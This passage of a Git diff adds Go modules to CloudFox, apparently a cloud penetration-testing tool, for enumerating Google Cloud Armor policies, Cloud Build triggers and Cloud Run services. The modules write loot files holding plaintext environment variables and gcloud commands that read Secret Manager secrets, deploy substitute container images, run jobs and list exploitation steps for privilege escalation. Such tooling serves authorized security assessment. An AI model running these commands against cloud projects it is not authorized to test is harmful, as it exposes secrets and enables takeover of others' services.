map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudArmorOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudArmorOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudArmorOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudArmorCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDARMOR_MODULE_NAME) + if err != nil { + return + } + + module := &CloudArmorModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Policies: []cloudarmorservice.SecurityPolicy{}, + UnprotectedLBs: make(map[string][]string), + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudArmorModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDARMOR_MODULE_NAME, m.processProject) + + // Count unprotected LBs + totalUnprotected := 0 + for _, lbs := range m.UnprotectedLBs { + totalUnprotected += len(lbs) + } + + if len(m.Policies) == 0 && totalUnprotected == 0 { + logger.InfoM("No Cloud Armor policies found", globals.GCP_CLOUDARMOR_MODULE_NAME) + return + } + + // Count policies with weaknesses + weakPolicies := 0 + for _, policy := range m.Policies { + if len(policy.Weaknesses) > 0 { + weakPolicies++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d security policy(ies), %d with weaknesses, %d unprotected LB(s)", + len(m.Policies), weakPolicies, totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) + + if totalUnprotected > 0 { + logger.InfoM(fmt.Sprintf("[MEDIUM] %d load balancer(s) have no Cloud Armor protection", totalUnprotected), globals.GCP_CLOUDARMOR_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudArmorModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking Cloud Armor in project: %s", projectID), globals.GCP_CLOUDARMOR_MODULE_NAME) + } + + svc := cloudarmorservice.New() + + // Get security policies + policies, err := svc.GetSecurityPolicies(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDARMOR_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Armor security policies in project %s", projectID)) + } + + // Get unprotected LBs + unprotectedLBs, err := svc.GetUnprotectedLoadBalancers(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDARMOR_MODULE_NAME, + fmt.Sprintf("Could not enumerate unprotected load balancers in project %s", projectID)) + } + + m.mu.Lock() + m.Policies = append(m.Policies, policies...) + if len(unprotectedLBs) > 0 { + m.UnprotectedLBs[projectID] = unprotectedLBs + } + + for _, policy := range policies { + m.addPolicyToLoot(policy) + } + for _, lb := range unprotectedLBs { + m.addUnprotectedLBToLoot(projectID, lb) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudArmorModule) initializeLootFiles() { + m.LootMap["cloudarmor-details"] = &internal.LootFile{ + Name: "cloudarmor-details", + Contents: "# Cloud Armor Details\n# Generated by CloudFox\n\n", + } +} + +func (m *CloudArmorModule) addPolicyToLoot(policy cloudarmorservice.SecurityPolicy) { + // Build flags for special attributes + var flags []string + if len(policy.Weaknesses) > 0 { + flags = append(flags, "HAS WEAKNESSES") + } + + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" + } + + adaptive := "No" + if policy.AdaptiveProtection { + adaptive = "Yes" + } + + resources := "None" + if len(policy.AttachedResources) > 0 { + resources = strings.Join(policy.AttachedResources, ", ") + } + + m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + "# %s%s\n"+ + "Project: %s | Type: %s\n"+ + "Rules: %d | Adaptive Protection: %s\n"+ + "Attached Resources: %s\n", + policy.Name, flagStr, + policy.ProjectID, policy.Type, + policy.RuleCount, adaptive, + resources, + ) + + // Add weaknesses if any + if len(policy.Weaknesses) > 0 { + m.LootMap["cloudarmor-details"].Contents += "Weaknesses:\n" + for _, weakness := range policy.Weaknesses { + m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf(" - %s\n", weakness) + } + } + + // Add rules + if len(policy.Rules) > 0 { + m.LootMap["cloudarmor-details"].Contents += "Rules:\n" + for _, rule := range policy.Rules { + preview := "" + if rule.Preview { + preview = " [PREVIEW]" + } + m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + " - Priority %d: %s%s\n"+ + " Match: %s\n", + rule.Priority, rule.Action, preview, + rule.Match, + ) + if rule.RateLimitConfig != nil { + m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + " Rate Limit: %d requests per %d seconds\n", + rule.RateLimitConfig.ThresholdCount, + rule.RateLimitConfig.IntervalSec, + ) + } + } + } + + m.LootMap["cloudarmor-details"].Contents += "\n" +} + +func (m *CloudArmorModule) addUnprotectedLBToLoot(projectID, lbName string) { + m.LootMap["cloudarmor-details"].Contents += fmt.Sprintf( + "# %s [UNPROTECTED]\n"+ + "Project: %s\n"+ + "No Cloud Armor policy attached\n\n", + lbName, projectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudArmorModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Security policies table + if len(m.Policies) > 0 { + header := []string{"Project Name", "Project ID", "Name", "Type", "Rules", "Attached Resources", "Adaptive Protection"} + var body [][]string + + for _, policy := range m.Policies { + adaptive := "No" + if policy.AdaptiveProtection { + adaptive = "Yes" + } + + resources := "-" + if len(policy.AttachedResources) > 0 { + resources = strings.Join(policy.AttachedResources, ", ") + } + + body = append(body, []string{ + m.GetProjectName(policy.ProjectID), + policy.ProjectID, + policy.Name, + policy.Type, + fmt.Sprintf("%d", policy.RuleCount), + resources, + adaptive, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "security-policies", + Header: header, + Body: body, + }) + } + + // Unprotected backend services table + var unprotectedList []struct { + ProjectID string + LBName string + } + for projectID, lbs := range m.UnprotectedLBs { + for _, lb := range lbs { + unprotectedList = append(unprotectedList, struct { + ProjectID string + LBName string + }{projectID, lb}) + } + } + + if len(unprotectedList) > 0 { + header := []string{"Project Name", "Project ID", "Backend Service"} + var body [][]string + + for _, item := range unprotectedList { + body = append(body, []string{ + m.GetProjectName(item.ProjectID), + item.ProjectID, + item.LBName, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "unprotected-backend-services", + Header: header, + Body: body, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := CloudArmorOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDARMOR_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/cloudbuild.go b/gcp/commands/cloudbuild.go new file mode 100644 index 00000000..daedbc48 --- /dev/null +++ b/gcp/commands/cloudbuild.go @@ -0,0 +1,373 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + cloudbuildservice "github.com/BishopFox/cloudfox/gcp/services/cloudbuildService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudBuildCommand = &cobra.Command{ + Use: globals.GCP_CLOUDBUILD_MODULE_NAME, + Aliases: []string{"cb", "build", "builds"}, + Short: "Enumerate Cloud Build triggers and builds", + Long: `Enumerate Cloud Build triggers and recent build executions. + +Features: +- Lists all build triggers +- Shows trigger source configuration (GitHub, CSR) +- Identifies service accounts used for builds +- Shows recent build executions +- Detects potentially risky trigger configurations`, + Run: runGCPCloudBuildCommand, +} + +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type CloudBuildModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + Triggers []cloudbuildservice.TriggerInfo + Builds []cloudbuildservice.BuildInfo + SecurityAnalysis []cloudbuildservice.TriggerSecurityAnalysis + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// ------------------------------ +type CloudBuildOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudBuildOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudBuildOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudBuildCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDBUILD_MODULE_NAME) + if err != nil { + return + } + + module := &CloudBuildModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Triggers: []cloudbuildservice.TriggerInfo{}, + Builds: []cloudbuildservice.BuildInfo{}, + SecurityAnalysis: []cloudbuildservice.TriggerSecurityAnalysis{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudBuildModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDBUILD_MODULE_NAME, m.processProject) + + if len(m.Triggers) == 0 && len(m.Builds) == 0 { + logger.InfoM("No Cloud Build triggers or builds found", globals.GCP_CLOUDBUILD_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d trigger(s), %d recent build(s)", + len(m.Triggers), len(m.Builds)), globals.GCP_CLOUDBUILD_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudBuildModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Build in project: %s", projectID), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + + cbSvc := cloudbuildservice.New() + + // Get triggers + triggers, err := cbSvc.ListTriggers(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDBUILD_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Build triggers in project %s", projectID)) + } + + // Get recent builds + builds, err := cbSvc.ListBuilds(projectID, 20) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDBUILD_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Build builds in project %s", projectID)) + } + + m.mu.Lock() + m.Triggers = append(m.Triggers, triggers...) + m.Builds = append(m.Builds, builds...) + + for _, trigger := range triggers { + m.addTriggerToLoot(trigger) + // Perform security analysis + analysis := cbSvc.AnalyzeTriggerForPrivesc(trigger, projectID) + m.SecurityAnalysis = append(m.SecurityAnalysis, analysis) + m.addSecurityAnalysisToLoot(analysis) + } + + // Add build step analysis to loot + for _, build := range builds { + m.addBuildToLoot(build) + } + m.mu.Unlock() +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudBuildModule) initializeLootFiles() { + m.LootMap["cloudbuild-details"] = &internal.LootFile{ + Name: "cloudbuild-details", + Contents: "# Cloud Build Details\n# Generated by CloudFox\n\n", + } +} + +func (m *CloudBuildModule) addTriggerToLoot(trigger cloudbuildservice.TriggerInfo) { + // Build flags for special attributes + var flags []string + if trigger.PrivescPotential { + flags = append(flags, "PRIVESC POTENTIAL") + } + if trigger.Disabled { + flags = append(flags, "DISABLED") + } + + flagStr := "" + if len(flags) > 0 { + flagStr = " [" + strings.Join(flags, "] [") + "]" + } + + sa := trigger.ServiceAccount + if sa == "" { + sa = "(default)" + } + + branchTag := trigger.BranchName + if branchTag == "" { + branchTag = trigger.TagName + } + + m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf( + "# %s (%s)%s\n"+ + "Project: %s\n"+ + "Source: %s - %s\n"+ + "Branch/Tag: %s | Config: %s\n"+ + "Service Account: %s\n", + trigger.Name, trigger.ID, flagStr, + trigger.ProjectID, + trigger.SourceType, trigger.RepoName, + branchTag, trigger.Filename, + sa, + ) +} + +func (m *CloudBuildModule) addSecurityAnalysisToLoot(analysis cloudbuildservice.TriggerSecurityAnalysis) { + // Add exploitation commands if available + if len(analysis.ExploitCommands) > 0 { + m.LootMap["cloudbuild-details"].Contents += "Exploitation:\n" + for _, cmd := range analysis.ExploitCommands { + m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf(" %s\n", cmd) + } + } + m.LootMap["cloudbuild-details"].Contents += "\n" +} + +func (m *CloudBuildModule) addBuildToLoot(build cloudbuildservice.BuildInfo) { + buildID := build.ID + if len(buildID) > 12 { + buildID = buildID[:12] + } + + m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf( + "# Build: %s\n"+ + "Project: %s | Status: %s\n"+ + "Trigger: %s | Source: %s\n", + buildID, + build.ProjectID, build.Status, + build.TriggerID, build.Source, + ) + + // Log location + if build.LogsBucket != "" { + m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf( + "Logs: gsutil cat %s/log-%s.txt\n", + build.LogsBucket, build.ID, + ) + } + + // Secret environment variables + if len(build.SecretEnvVars) > 0 { + m.LootMap["cloudbuild-details"].Contents += "Secret Env Vars:\n" + for _, secret := range build.SecretEnvVars { + m.LootMap["cloudbuild-details"].Contents += fmt.Sprintf(" - %s\n", secret) + } + } + + m.LootMap["cloudbuild-details"].Contents += "\n" +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudBuildModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Triggers table + triggersHeader := []string{ + "Project Name", + "Project ID", + "Name", + "Source", + "Repository", + "Branch/Tag", + "Config File", + "Service Account", + "Disabled", + "Privesc Potential", + } + + var triggersBody [][]string + privescCount := 0 + for _, trigger := range m.Triggers { + disabled := "No" + if trigger.Disabled { + disabled = "Yes" + } + + privesc := "No" + if trigger.PrivescPotential { + privesc = "Yes" + privescCount++ + } + + branchTag := trigger.BranchName + if branchTag == "" { + branchTag = trigger.TagName + } + + sa := trigger.ServiceAccount + if sa == "" { + sa = "(default)" + } + + triggersBody = append(triggersBody, []string{ + m.GetProjectName(trigger.ProjectID), + trigger.ProjectID, + trigger.Name, + trigger.SourceType, + trigger.RepoName, + branchTag, + trigger.Filename, + sa, + disabled, + privesc, + }) + } + + // Builds table + buildsHeader := []string{ + "Project Name", + "Project ID", + "ID", + "Status", + "Trigger", + "Source", + "Created", + } + + var buildsBody [][]string + for _, build := range m.Builds { + buildID := build.ID + if len(buildID) > 12 { + buildID = buildID[:12] + } + buildsBody = append(buildsBody, []string{ + m.GetProjectName(build.ProjectID), + build.ProjectID, + buildID, + build.Status, + build.TriggerID, + build.Source, + build.CreateTime, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + var tables []internal.TableFile + + if len(triggersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloudbuild-triggers", + Header: triggersHeader, + Body: triggersBody, + }) + } + + if len(buildsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloudbuild-builds", + Header: buildsHeader, + Body: buildsBody, + }) + } + + if privescCount > 0 { + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d trigger(s) with privilege escalation potential!", privescCount), globals.GCP_CLOUDBUILD_MODULE_NAME) + } + + output := CloudBuildOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDBUILD_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/cloudrun.go b/gcp/commands/cloudrun.go new file mode 100644 index 00000000..737c7480 --- /dev/null +++ b/gcp/commands/cloudrun.go @@ -0,0 +1,628 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + CloudRunService "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPCloudRunCommand = &cobra.Command{ + Use: globals.GCP_CLOUDRUN_MODULE_NAME, + Aliases: []string{"run", "cr"}, + Short: "Enumerate Cloud Run services and jobs with security analysis", + Long: `Enumerate Cloud Run services and jobs across projects with security-relevant details. + +Features: +- Lists all Cloud Run services and jobs +- Shows security configuration (ingress, VPC, service account) +- Identifies publicly invokable services (allUsers/allAuthenticatedUsers) +- Shows container image, resources, and scaling configuration +- Counts environment variables and secret references +- Generates gcloud commands for further analysis + +Security Columns: +- Ingress: INGRESS_TRAFFIC_ALL (public), INTERNAL_ONLY, or INTERNAL_LOAD_BALANCER +- Public: Whether allUsers or allAuthenticatedUsers can invoke the service +- ServiceAccount: The identity the service runs as +- VPCAccess: Network connectivity to VPC resources +- Secrets: Count of secret environment variables and volumes + +Attack Surface: +- Public services with ALL ingress are internet-accessible +- Services with default service account may have excessive permissions +- VPC-connected services can access internal resources +- Container images may contain vulnerabilities or secrets`, + Run: runGCPCloudRunCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CloudRunModule struct { + gcpinternal.BaseGCPModule + + Services []CloudRunService.ServiceInfo + Jobs []CloudRunService.JobInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CloudRunOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CloudRunOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CloudRunOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCloudRunCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_CLOUDRUN_MODULE_NAME) + if err != nil { + return + } + + module := &CloudRunModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Services: []CloudRunService.ServiceInfo{}, + Jobs: []CloudRunService.JobInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CloudRunModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_CLOUDRUN_MODULE_NAME, m.processProject) + + totalResources := len(m.Services) + len(m.Jobs) + if totalResources == 0 { + logger.InfoM("No Cloud Run services or jobs found", globals.GCP_CLOUDRUN_MODULE_NAME) + return + } + + // Count public services + publicCount := 0 + for _, svc := range m.Services { + if svc.IsPublic { + publicCount++ + } + } + + if publicCount > 0 { + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s), %d public", len(m.Services), len(m.Jobs), publicCount), globals.GCP_CLOUDRUN_MODULE_NAME) + } else { + logger.SuccessM(fmt.Sprintf("Found %d service(s), %d job(s)", len(m.Services), len(m.Jobs)), globals.GCP_CLOUDRUN_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CloudRunModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Cloud Run in project: %s", projectID), globals.GCP_CLOUDRUN_MODULE_NAME) + } + + cs := CloudRunService.New() + + // Get services + services, err := cs.Services(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDRUN_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run services in project %s", projectID)) + } else { + m.mu.Lock() + m.Services = append(m.Services, services...) + for _, svc := range services { + m.addServiceToLoot(svc) + } + m.mu.Unlock() + } + + // Get jobs + jobs, err := cs.Jobs(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_CLOUDRUN_MODULE_NAME, + fmt.Sprintf("Could not enumerate Cloud Run jobs in project %s", projectID)) + } else { + m.mu.Lock() + m.Jobs = append(m.Jobs, jobs...) + for _, job := range jobs { + m.addJobToLoot(job) + } + m.mu.Unlock() + } + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d service(s), %d job(s) in project %s", len(services), len(jobs), projectID), globals.GCP_CLOUDRUN_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CloudRunModule) initializeLootFiles() { + m.LootMap["cloudrun-commands"] = &internal.LootFile{ + Name: "cloudrun-commands", + Contents: "# Cloud Run Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["cloudrun-env-vars"] = &internal.LootFile{ + Name: "cloudrun-env-vars", + Contents: "# Cloud Run Environment Variables\n# Generated by CloudFox\n\n", + } + m.LootMap["cloudrun-secret-refs"] = &internal.LootFile{ + Name: "cloudrun-secret-refs", + Contents: "# Cloud Run Secret Manager References\n# Generated by CloudFox\n# Use: gcloud secrets versions access VERSION --secret=SECRET_NAME --project=PROJECT\n\n", + } +} + +func (m *CloudRunModule) addServiceToLoot(svc CloudRunService.ServiceInfo) { + // All commands for this service + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "## Service: %s (Project: %s, Region: %s)\n"+ + "# Image: %s\n"+ + "# Service Account: %s\n"+ + "# Public: %v\n"+ + "# URL: %s\n\n"+ + "# Describe service:\n"+ + "gcloud run services describe %s --region=%s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud run services get-iam-policy %s --region=%s --project=%s\n"+ + "# List revisions:\n"+ + "gcloud run revisions list --service=%s --region=%s --project=%s\n"+ + "# Invoke the service (if you have run.routes.invoke):\n"+ + "curl -H \"Authorization: Bearer $(gcloud auth print-identity-token)\" %s\n"+ + "# Deploy revision (if you have run.services.update):\n"+ + "gcloud run deploy %s --image=YOUR_IMAGE --region=%s --project=%s\n"+ + "# Read container logs (if you have logging.logEntries.list):\n"+ + "gcloud logging read 'resource.type=\"cloud_run_revision\" resource.labels.service_name=\"%s\"' --project=%s --limit=50\n\n", + svc.Name, svc.ProjectID, svc.Region, + svc.ContainerImage, + svc.ServiceAccount, + svc.IsPublic, + svc.URL, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.Region, svc.ProjectID, + svc.URL, + svc.Name, svc.Region, svc.ProjectID, + svc.Name, svc.ProjectID, + ) + + // Add environment variables to loot + if len(svc.EnvVars) > 0 { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) + for _, env := range svc.EnvVars { + if env.Source == "direct" { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) + } else { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) + } + } + m.LootMap["cloudrun-env-vars"].Contents += "\n" + } + + // Add secret references to loot + if len(svc.SecretRefs) > 0 { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf("## Service: %s (Project: %s, Region: %s)\n", svc.Name, svc.ProjectID, svc.Region) + for _, ref := range svc.SecretRefs { + if ref.Type == "env" { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", + ref.EnvVarName, ref.SecretVersion, ref.SecretName, svc.ProjectID, + ) + } else { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", + ref.MountPath, ref.SecretName, svc.ProjectID, + ) + } + } + m.LootMap["cloudrun-secret-refs"].Contents += "\n" + } +} + +func (m *CloudRunModule) addJobToLoot(job CloudRunService.JobInfo) { + // All commands for this job + m.LootMap["cloudrun-commands"].Contents += fmt.Sprintf( + "## Job: %s (Project: %s, Region: %s)\n"+ + "# Image: %s\n"+ + "# Service Account: %s\n\n"+ + "# Describe job:\n"+ + "gcloud run jobs describe %s --region=%s --project=%s\n"+ + "# List executions:\n"+ + "gcloud run jobs executions list --job=%s --region=%s --project=%s\n"+ + "# Execute the job (if you have run.jobs.run):\n"+ + "gcloud run jobs execute %s --region=%s --project=%s\n"+ + "# Update job image (if you have run.jobs.update):\n"+ + "gcloud run jobs update %s --image=YOUR_IMAGE --region=%s --project=%s\n\n", + job.Name, job.ProjectID, job.Region, + job.ContainerImage, + job.ServiceAccount, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + job.Name, job.Region, job.ProjectID, + ) + + // Add environment variables to loot + if len(job.EnvVars) > 0 { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) + for _, env := range job.EnvVars { + if env.Source == "direct" { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=%s\n", env.Name, env.Value) + } else { + m.LootMap["cloudrun-env-vars"].Contents += fmt.Sprintf("%s=[Secret: %s:%s]\n", env.Name, env.SecretName, env.SecretVersion) + } + } + m.LootMap["cloudrun-env-vars"].Contents += "\n" + } + + // Add secret references to loot + if len(job.SecretRefs) > 0 { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf("## Job: %s (Project: %s, Region: %s)\n", job.Name, job.ProjectID, job.Region) + for _, ref := range job.SecretRefs { + if ref.Type == "env" { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Env var: %s\ngcloud secrets versions access %s --secret=%s --project=%s\n", + ref.EnvVarName, ref.SecretVersion, ref.SecretName, job.ProjectID, + ) + } else { + m.LootMap["cloudrun-secret-refs"].Contents += fmt.Sprintf( + "# Volume mount: %s\ngcloud secrets versions access latest --secret=%s --project=%s\n", + ref.MountPath, ref.SecretName, job.ProjectID, + ) + } + } + m.LootMap["cloudrun-secret-refs"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CloudRunModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Services table + servicesHeader := []string{ + "Project ID", + "Project Name", + "Name", + "Region", + "URL", + "Ingress", + "Public", + "Invokers", + "Service Account", + "Default SA", + "Image", + "VPC Access", + "Min/Max", + "Env Vars", + "Secrets", + "Hardcoded", + } + + var servicesBody [][]string + for _, svc := range m.Services { + // Format public status + publicStatus := "No" + if svc.IsPublic { + publicStatus = "Yes" + } + + // Format default SA status + defaultSA := "No" + if svc.UsesDefaultSA { + defaultSA = "Yes" + } + + // Format invokers + invokers := "-" + if len(svc.InvokerMembers) > 0 { + invokers = strings.Join(svc.InvokerMembers, ", ") + } + + // Format VPC access + vpcAccess := "-" + if svc.VPCAccess != "" { + vpcAccess = extractName(svc.VPCAccess) + if svc.VPCEgressSettings != "" { + vpcAccess += fmt.Sprintf(" (%s)", strings.TrimPrefix(svc.VPCEgressSettings, "VPC_EGRESS_")) + } + } + + // Format scaling + scaling := fmt.Sprintf("%d/%d", svc.MinInstances, svc.MaxInstances) + + // Format env var count + envVars := "-" + if svc.EnvVarCount > 0 { + envVars = fmt.Sprintf("%d", svc.EnvVarCount) + } + + // Format secrets count (Secret Manager references) + secretCount := svc.SecretEnvVarCount + svc.SecretVolumeCount + secrets := "-" + if secretCount > 0 { + secrets = fmt.Sprintf("%d", secretCount) + } + + // Format hardcoded secrets count + hardcoded := "No" + if len(svc.HardcodedSecrets) > 0 { + hardcoded = fmt.Sprintf("Yes (%d)", len(svc.HardcodedSecrets)) + } + + servicesBody = append(servicesBody, []string{ + svc.ProjectID, + m.GetProjectName(svc.ProjectID), + svc.Name, + svc.Region, + svc.URL, + formatIngress(svc.IngressSettings), + publicStatus, + invokers, + svc.ServiceAccount, + defaultSA, + svc.ContainerImage, + vpcAccess, + scaling, + envVars, + secrets, + hardcoded, + }) + } + + // Jobs table + jobsHeader := []string{ + "Project ID", + "Project Name", + "Name", + "Region", + "Service Account", + "Default SA", + "Image", + "Tasks", + "Parallelism", + "Last Execution", + "Env Vars", + "Secrets", + "Hardcoded", + } + + var jobsBody 